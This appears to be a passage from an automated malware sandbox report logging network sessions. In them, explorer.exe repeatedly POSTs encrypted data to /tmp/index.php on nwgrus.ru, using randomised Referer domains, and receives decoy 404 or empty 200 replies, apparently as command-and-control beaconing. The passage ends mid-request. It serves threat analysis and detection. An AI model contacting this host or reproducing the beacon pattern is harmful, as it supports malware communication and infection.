                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          12192.168.2.661334160.177.223.165804004C:\Windows\explorer.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 8, 2024 18:23:41.876885891 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: http://swrrssmuceopwlwv.com/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 194
                                                                                                                          Host: nwgrus.ru
                                                                                                                          Oct 8, 2024 18:23:41.876885891 CEST194OUTData Raw: 3b 6e 52 66 84 bc 6b 56 d6 a9 b2 01 03 70 7b bb 79 79 cd 90 69 73 e5 6a 0f 75 79 97 43 c7 c7 6b 92 2a c1 29 75 64 2b 6c ed 9d 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 01 6b 2c 90 f5 76 0b 75 6c 4e df bd
                                                                                                                          Data Ascii: ;nRfkVp{yyisjuyCk*)ud+l?!0jHYcM@NA -[k,vulN]Jc8VEgt1[=S{WU4?7B?HH<:=pmDX4@C$3jEB
                                                                                                                          Oct 8, 2024 18:23:42.739319086 CEST484INHTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.26.0
                                                                                                                          Date: Tue, 08 Oct 2024 16:23:42 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Connection: close
                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          13192.168.2.661340160.177.223.165804004C:\Windows\explorer.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 8, 2024 18:23:42.748801947 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: http://mcrofbggconl.net/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 245
                                                                                                                          Host: nwgrus.ru
                                                                                                                          Oct 8, 2024 18:23:42.748814106 CEST245OUTData Raw: 3b 6e 52 66 84 bc 6b 56 d6 a9 b2 01 03 70 7b bb 79 79 cd 90 69 73 e5 6a 0f 75 79 97 43 c7 c7 6b 92 2a c1 29 75 64 2b 6c ed 9d 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 06 6b 2c 90 f5 76 0b 75 3b 20 a1 f4
                                                                                                                          Data Ascii: ;nRfkVp{yyisjuyCk*)ud+l?!0jHYcM@NA -[k,vu; %]mp3hASkitFzI@i4R/Ys6&PG9F8V$iX'Y:f]-!qWn2}IoJQ
                                                                                                                          Oct 8, 2024 18:23:43.610102892 CEST484INHTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.26.0
                                                                                                                          Date: Tue, 08 Oct 2024 16:23:43 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Connection: close
                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          14192.168.2.661347160.177.223.165804004C:\Windows\explorer.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 8, 2024 18:23:43.620249033 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: http://euadhmjtligscip.net/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 287
                                                                                                                          Host: nwgrus.ru
                                                                                                                          Oct 8, 2024 18:23:43.620275021 CEST287OUTData Raw: 3b 6e 52 66 84 bc 6b 56 d6 a9 b2 01 03 70 7b bb 79 79 cd 90 69 73 e5 6a 0f 75 79 97 43 c7 c7 6b 92 2a c1 29 75 64 2b 6c ed 9d 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 07 6b 2c 90 f5 76 0b 75 33 49 c9 81
                                                                                                                          Data Ascii: ;nRfkVp{yyisjuyCk*)ud+l?!0jHYcM@NA -[k,vu3IJKQXtPn+E_lbH4~B=S7=VRgE9OQ*jL#V`A+|DF8N7V~OR?Dn^a|lX
                                                                                                                          Oct 8, 2024 18:23:44.512805939 CEST137INHTTP/1.1 200 OK
                                                                                                                          Server: nginx/1.26.0
                                                                                                                          Date: Tue, 08 Oct 2024 16:23:44 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Connection: close


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          15192.168.2.661355160.177.223.165804004C:\Windows\explorer.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 8, 2024 18:23:44.520380020 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: http://oratgvwctswjsrg.com/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 289
                                                                                                                          Host: nwgrus.ru
                                                                                                                          Oct 8, 2024 18:23:44.520416021 CEST289OUTData Raw: 3b 6e 52 66 84 bc 6b 56 d6 a9 b2 01 03 70 7b bb 79 79 cd 90 69 73 e5 6a 0f 75 79 97 43 c7 c7 6b 92 2a c1 29 75 64 2b 6c ed 9d 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 04 6b 2c 90 f5 76 0b 75 60 14 de e3
                                                                                                                          Data Ascii: ;nRfkVp{yyisjuyCk*)ud+l?!0jHYcM@NA -[k,vu`s!Eab-?b`w;:K!#AN0MQ}Sx)NcmeYsHP($6vJEZnK%Z4'
                                                                                                                          Oct 8, 2024 18:23:45.414834023 CEST484INHTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.26.0
                                                                                                                          Date: Tue, 08 Oct 2024 16:23:45 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Connection: close
                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          16192.168.2.661360160.177.223.165804004C:\Windows\explorer.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 8, 2024 18:23:45.424655914 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: http://jukynnhymwnwl.org/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 281
                                                                                                                          Host: nwgrus.ru
                                                                                                                          Oct 8, 2024 18:23:45.424655914 CEST281OUTData Raw: 3b 6e 52 66 84 bc 6b 56 d6 a9 b2 01 03 70 7b bb 79 79 cd 90 69 73 e5 6a 0f 75 79 97 43 c7 c7 6b 92 2a c1 29 75 64 2b 6c ed 9d 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 05 6b 2c 90 f5 76 0b 75 54 5b c4 f6
                                                                                                                          Data Ascii: ;nRfkVp{yyisjuyCk*)ud+l?!0jHYcM@NA -[k,vuT[_[G]i2/+~3oU<C70+X^]kP#G$#L'2]S)xC?!>`AoBEnGSxBm+(o
                                                                                                                          Oct 8, 2024 18:23:46.355251074 CEST137INHTTP/1.1 200 OK
                                                                                                                          Server: nginx/1.26.0
                                                                                                                          Date: Tue, 08 Oct 2024 16:23:46 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Connection: close


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          17192.168.2.661365160.177.223.165804004C:\Windows\explorer.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 8, 2024 18:23:46.366725922 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: http://pithrelifcqallw.net/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 148
                                                                                                                          Host: nwgrus.ru
                                                                                                                          Oct 8, 2024 18:23:46.366753101 CEST148OUTData Raw: 3b 6e 52 66 84 bc 6b 56 d6 a9 b2 01 03 70 7b bb 79 79 cd 90 69 73 e5 6a 0f 75 79 97 43 c7 c7 6b 92 2a c1 29 75 64 2b 6c ed 9d 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 1a 6b 2c 90 f5 76 0b 75 54 52 e6 88
                                                                                                                          Data Ascii: ;nRfkVp{yyisjuyCk*)ud+l?!0jHYcM@NA -[k,vuTRdeh{^`YR6htE4pz^@hTKMih
                                                                                                                          Oct 8, 2024 18:23:47.251260996 CEST484INHTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.26.0
                                                                                                                          Date: Tue, 08 Oct 2024 16:23:47 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Connection: close
                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          18192.168.2.661370160.177.223.165804004C:\Windows\explorer.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 8, 2024 18:23:47.260538101 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: http://kdahnseejtpvc.org/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 147
                                                                                                                          Host: nwgrus.ru
                                                                                                                          Oct 8, 2024 18:23:47.260550022 CEST147OUTData Raw: 3b 6e 52 66 84 bc 6b 56 d6 a9 b2 01 03 70 7b bb 79 79 cd 90 69 73 e5 6a 0f 75 79 97 43 c7 c7 6b 92 2a c1 29 75 64 2b 6c ed 9d 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 1b 6b 2c 90 f5 76 0b 75 31 08 e7 a8
                                                                                                                          Data Ascii: ;nRfkVp{yyisjuyCk*)ud+l?!0jHYcM@NA -[k,vu1BiScjP{Fyk<B\f|AK]9-.^x
                                                                                                                          Oct 8, 2024 18:23:48.813927889 CEST484INHTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.26.0
                                                                                                                          Date: Tue, 08 Oct 2024 16:23:48 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Connection: close
                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                                                                                                                          Oct 8, 2024 18:23:48.814500093 CEST484INHTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.26.0
                                                                                                                          Date: Tue, 08 Oct 2024 16:23:48 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Connection: close
                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                                                                                                                          Oct 8, 2024 18:23:48.818655014 CEST484INHTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.26.0
                                                                                                                          Date: Tue, 08 Oct 2024 16:23:48 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Connection: close
                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          19192.168.2.661375160.177.223.165804004C:\Windows\explorer.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 8, 2024 18:23:48.825911045 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: http://umfnnmmrmjakpw.org/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 314
                                                                                                                          Host: nwgrus.ru
                                                                                                                          Oct 8, 2024 18:23:48.825943947 CEST314OUTData Raw: 3b 6e 52 66 84 bc 6b 56 d6 a9 b2 01 03 70 7b bb 79 79 cd 90 69 73 e5 6a 0f 75 79 97 43 c7 c7 6b 92 2a c1 29 75 64 2b 6c ed 9d 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 18 6b 2c 90 f5 76 0b 75 4d 00 a6 86
                                                                                                                          Data Ascii: ;nRfkVp{yyisjuyCk*)ud+l?!0jHYcM@NA -[k,vuM4kXxasWTCVz e8M](xeA5BI!,/ZrMez!u1"#Vz$^+q%S/
                                                                                                                          Oct 8, 2024 18:23:49.698420048 CEST137INHTTP/1.1 200 OK
                                                                                                                          Server: nginx/1.26.0
                                                                                                                          Date: Tue, 08 Oct 2024 16:23:49 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Connection: close


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          20192.168.2.661382160.177.223.165804004C:\Windows\explorer.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 8, 2024 18:23:49.709860086 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
